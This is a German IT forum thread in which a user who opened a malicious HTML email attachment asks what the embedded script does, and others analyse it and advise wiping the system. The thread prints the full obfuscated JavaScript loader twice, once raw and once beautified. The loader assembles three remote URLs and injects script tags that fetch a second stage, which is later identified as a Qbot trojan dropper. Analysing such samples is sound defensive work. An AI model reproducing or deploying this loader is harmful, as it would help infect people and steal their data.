12
HTML Javascript Schadcode?
Hallo Leute
wie blöd muss man sein. Ich predige jeden Tag "keine unbekannten oder merkwürdig Anhänge öffnen" und vor lauter husch husch ist es mir jetzt selbst passiert.
Der Emailanhang war eine *.html Datei und die ersten zig Zeilen waren auch nur lateinischer Text. In den letzten 3 Zeilen war der code.
Der Kaspersky hat nicht angeschlagen.
Weiß vielleicht jemand was ich mir da eingefangen habe?
wie blöd muss man sein. Ich predige jeden Tag "keine unbekannten oder merkwürdig Anhänge öffnen" und vor lauter husch husch ist es mir jetzt selbst passiert.
Der Emailanhang war eine *.html Datei und die ersten zig Zeilen waren auch nur lateinischer Text. In den letzten 3 Zeilen war der code.
<script type="text/javascript">
var a0gaxemmamnmai=a0auopbttselaeva;(function(paltvonousn,molssurosiumdpo){var aqsupimi=a0auopbttselaeva,lnpmaguiac=paltvonousn();while(!![]){try{var uaamumatquindlail=parseInt(aqsupimi(0xc8))/0x1*(parseInt(aqsupimi(0xc7))/0x2)+parseInt(aqsupimi(0xc3))/0x3+parseInt(aqsupimi(0xc1))/0x4+-parseInt(aqsupimi(0xc6))/0x5+-parseInt(aqsupimi(0xc4))/0x6+-parseInt(aqsupimi(0xbf))/0x7*(-parseInt(aqsupimi(0xc5))/0x8)+-parseInt(aqsupimi(0xcf))/0x9;if(uaamumatquindlail===molssurosiumdpo)break;else lnpmaguiac['push'](lnpmaguiac['shift']());}catch(sdasenectuear){lnpmaguiac['push'](lnpmaguiac['shift']());}}}(a0pcuisssitint,0x9c462));function a0auopbttselaeva(pcuisssitint,auopbttselaeva){var paltvonousn=a0pcuisssitint();return a0auopbttselaeva=function(molssurosiumdpo,lnpmaguiac){molssurosiumdpo=molssurosiumdpo-0xbd;var uaamumatquindlail=paltvonousn[molssurosiumdpo];return uaamumatquindlail;},a0auopbttselaeva(pcuisssitint,auopbttselaeva);}var voluptatemrerum=[a0gaxemmamnmai(0xc2)+'nseg.com/qu/qu'+a0gaxemmamnmai(0xcc),'https://ksaa-e'+a0gaxemmamnmai(0xbe)+a0gaxemmamnmai(0xbd)+'2',a0gaxemmamnmai(0xd1)+a0gaxemmamnmai(0xca)+a0gaxemmamnmai(0xcd)+a0gaxemmamnmai(0xc0)+'5111'];function a0pcuisssitint(){var tboeurldsoi=['osscommunicati','appendChild','.php?14652','onservices.com','script','8538543FFQfSE','createElement','https://youngb','/enqu.php?2954','vents.com/enqu','8781570gbVRZg','/aua/aua.php?3','4856144NrAgbj','https://horizo','387975mYIIKZ','2511780PInbUf','8XBKhBs','6018945WNxSPK','12146zVqPWt','101AYDIcr','src'];a0pcuisssitint=function(){return tboeurldsoi;};return a0pcuisssitint();}for(var occaecatiestnesciunt in voluptatemrerum){var rem=document[a0gaxemmamnmai(0xd0)](a0gaxemmamnmai(0xce));rem[a0gaxemmamnmai(0xc9)]=voluptatemrerum[occaecatiestnesciunt],document['head'][a0gaxemmamnmai(0xcb)](rem);}
</script>Der Kaspersky hat nicht angeschlagen.
Weiß vielleicht jemand was ich mir da eingefangen habe?
Share on Facebook
Share on Twitter
Share on Reddit
Share on LinkedinPlease also mark the comments that contributed to the solution of the article
Content-Key: 6465992526
Url: https://administrator.de/contentid/6465992526
Printed on: April 29, 2024 at 11:04 o'clock
12 Comments
Latest comment
Hi,
Stage 1 läd ein Skript von 3 verschiedenen URLs nach, davon ist eine down.
Stage 2: https://pastebin.com/AriyCjZ1
Stage 2 scheint eine Datei abzuspeichern..
weiter komme ich heute nicht da ich meine Malware-Umgebung nicht dabei habe..
Stage 1 läd ein Skript von 3 verschiedenen URLs nach, davon ist eine down.
Stage 2: https://pastebin.com/AriyCjZ1
Stage 2 scheint eine Datei abzuspeichern..
weiter komme ich heute nicht da ich meine Malware-Umgebung nicht dabei habe..
Hier nach dem "Beautifier":
<script type = "text/javascript" >
var a0gaxemmamnmai = a0auopbttselaeva;
(function(paltvonousn, molssurosiumdpo) {
var aqsupimi = a0auopbttselaeva,
lnpmaguiac = paltvonousn();
while (!![]) {
try {
var uaamumatquindlail = parseInt(aqsupimi(0xc8)) / 0x1 * (parseInt(aqsupimi(0xc7)) / 0x2) + parseInt(aqsupimi(0xc3)) / 0x3 + parseInt(aqsupimi(0xc1)) / 0x4 + -parseInt(aqsupimi(0xc6)) / 0x5 + -parseInt(aqsupimi(0xc4)) / 0x6 + -parseInt(aqsupimi(0xbf)) / 0x7 * (-parseInt(aqsupimi(0xc5)) / 0x8) + -parseInt(aqsupimi(0xcf)) / 0x9;
if (uaamumatquindlail === molssurosiumdpo) break;
else lnpmaguiac['push'](lnpmaguiac['shift']());
} catch (sdasenectuear) {
lnpmaguiac['push'](lnpmaguiac['shift']());
}
}
}(a0pcuisssitint, 0x9c462));
function a0auopbttselaeva(pcuisssitint, auopbttselaeva) {
var paltvonousn = a0pcuisssitint();
return a0auopbttselaeva = function(molssurosiumdpo, lnpmaguiac) {
molssurosiumdpo = molssurosiumdpo - 0xbd;
var uaamumatquindlail = paltvonousn[molssurosiumdpo];
return uaamumatquindlail;
}, a0auopbttselaeva(pcuisssitint, auopbttselaeva);
}
var voluptatemrerum = [a0gaxemmamnmai(0xc2) + 'nseg.com/qu/qu' + a0gaxemmamnmai(0xcc), 'https://ksaa-e' + a0gaxemmamnmai(0xbe) + a0gaxemmamnmai(0xbd) + '2', a0gaxemmamnmai(0xd1) + a0gaxemmamnmai(0xca) + a0gaxemmamnmai(0xcd) + a0gaxemmamnmai(0xc0) + '5111'];
function a0pcuisssitint() {
var tboeurldsoi = ['osscommunicati', 'appendChild', '.php?14652', 'onservices.com', 'script', '8538543FFQfSE', 'createElement', 'https://youngb', '/enqu.php?2954', 'vents.com/enqu', '8781570gbVRZg', '/aua/aua.php?3', '4856144NrAgbj', 'https://horizo', '387975mYIIKZ', '2511780PInbUf', '8XBKhBs', '6018945WNxSPK', '12146zVqPWt', '101AYDIcr', 'src'];
a0pcuisssitint = function() {
return tboeurldsoi;
};
return a0pcuisssitint();
}
for (var occaecatiestnesciunt in voluptatemrerum) {
var rem = document[a0gaxemmamnmai(0xd0)](a0gaxemmamnmai(0xce));
rem[a0gaxemmamnmai(0xc9)] = voluptatemrerum[occaecatiestnesciunt], document['head'][a0gaxemmamnmai(0xcb)](rem);
} < /script>
Der dritte link wird von Kaspersky als "malicous" eingestuft.
https[:]//urlscan.io/result/ff8a27d1-0c02-4075-8b42-db08923d2245/#summary
Das Script (300kB) kann heruntergeladen und damit weiter geprüft werden.
https[:]//urlscan.io/result/ff8a27d1-0c02-4075-8b42-db08923d2245/#summary
Das Script (300kB) kann heruntergeladen und damit weiter geprüft werden.
Zitat von @Fennek11:
Der dritte link wird von Kaspersky als "malicous" eingestuft.
https[:]//urlscan.io/result/ff8a27d1-0c02-4075-8b42-db08923d2245/#summary
Das Script (300kB) kann heruntergeladen und damit weiter geprüft werden.
Der dritte link wird von Kaspersky als "malicous" eingestuft.
https[:]//urlscan.io/result/ff8a27d1-0c02-4075-8b42-db08923d2245/#summary
Das Script (300kB) kann heruntergeladen und damit weiter geprüft werden.
Erst einemal vielen an Euch.
Was sollte ich jetzt tun und wie werde ich das Ding wieder los
Was sollte ich jetzt tun und wie werde ich das Ding wieder los
Wenn du absolute Sicherheit willst, Alles platt machen, Windows neu installieren und Daten vom Backup wieder einspielen. Alles andere wäre als Vorschlag unseriös.
Danke für die Info
Was macht diese Ding eigentlich? Liest das Emailkonten, Benutzerzugänge (Firefox) und Passwörter aus?
Was macht diese Ding eigentlich? Liest das Emailkonten, Benutzerzugänge (Firefox) und Passwörter aus?
Zitat von @nullchecker:
Danke für die Info
Was macht diese Ding eigentlich? Liest das Emailkonten, Benutzerzugänge (Firefox) und Passwörter aus?
Im Endeffekt kann das Teil alles machen. Über eine Remote-Shell die mit dem CC Server in Kontakt steht kannst du nachladen was du gerade brauchst.Danke für die Info
Was macht diese Ding eigentlich? Liest das Emailkonten, Benutzerzugänge (Firefox) und Passwörter aus?
Platt machen und Kennwörter von den kritischsten Accounts sicherheitshalber ändern ist Pflichtprogramm bei unbekannten Infektionen.
Würde der Kaspersy das nachladen bemerken.
Läd das Ding von ganz alleine nach oder wird das von mir irgenwie ausgelöst (durch starten einer App).
Läd das Ding von ganz alleine nach oder wird das von mir irgenwie ausgelöst (durch starten einer App).
Würde ich mich nicht drauf verlassen. Das wird oft über Windows-Prozesse getarnt.
Läd das Ding von ganz alleine nach oder wird das von mir irgenwie ausgelöst (durch starten einer App).
Gibt es unterschiedliche Vorgehensweisen, meistens kontaktiert der Client einen CC (Command & Control Server) in zeitlichen Abständen, welcher meistens verschlüsselte Anweisungen für den Client abgelegt hat und die der Client dann ausführt. Das kann sogar durch getarnte DNS-Abfragen geschehen so das es noch weniger auffällt, oder durch zur Laufzeit injizierte JavaScripts im Browser etc. pp.
Vielen Dank für die Infos.
Werde auf Kurz oder Lan das Sxstem neu aufsetzen.
Werde auf Kurz oder Lan das Sxstem neu aufsetzen.
Hallo,
ich wollte hier nur noch eine kurze Rückmeldung geben.
Ich habe mit dem Support von Kaspersky (den hab ich als Virenscanner) Kontakt aufgenommen, und die haben mir mitgeteilt, dass das Skript von Rerum.html seit 17.03 von Kaspersky blockiert wird. Das Skript wird als HEUR:Trojan-Dropper.Script.Qbot.gen von Kaspersky geblockt.
Ich habe von Kas. und Mbar (Malwarebytes Anti-Rootkit ewiglange Scans laufen lassen und die haben nichts gefunden. Von daher gehe ich davon aus dass ich nochmal mit einem blauen Auge davongekommen bin.
Nichtsdestotrotz werde ich bei gelegenheit eine neue Maschine aufsetzen.
Euch nochmals vielen Dank für die Unterstützung
ich wollte hier nur noch eine kurze Rückmeldung geben.
Ich habe mit dem Support von Kaspersky (den hab ich als Virenscanner) Kontakt aufgenommen, und die haben mir mitgeteilt, dass das Skript von Rerum.html seit 17.03 von Kaspersky blockiert wird. Das Skript wird als HEUR:Trojan-Dropper.Script.Qbot.gen von Kaspersky geblockt.
Ich habe von Kas. und Mbar (Malwarebytes Anti-Rootkit ewiglange Scans laufen lassen und die haben nichts gefunden. Von daher gehe ich davon aus dass ich nochmal mit einem blauen Auge davongekommen bin.
Nichtsdestotrotz werde ich bei gelegenheit eine neue Maschine aufsetzen.
Euch nochmals vielen Dank für die Unterstützung
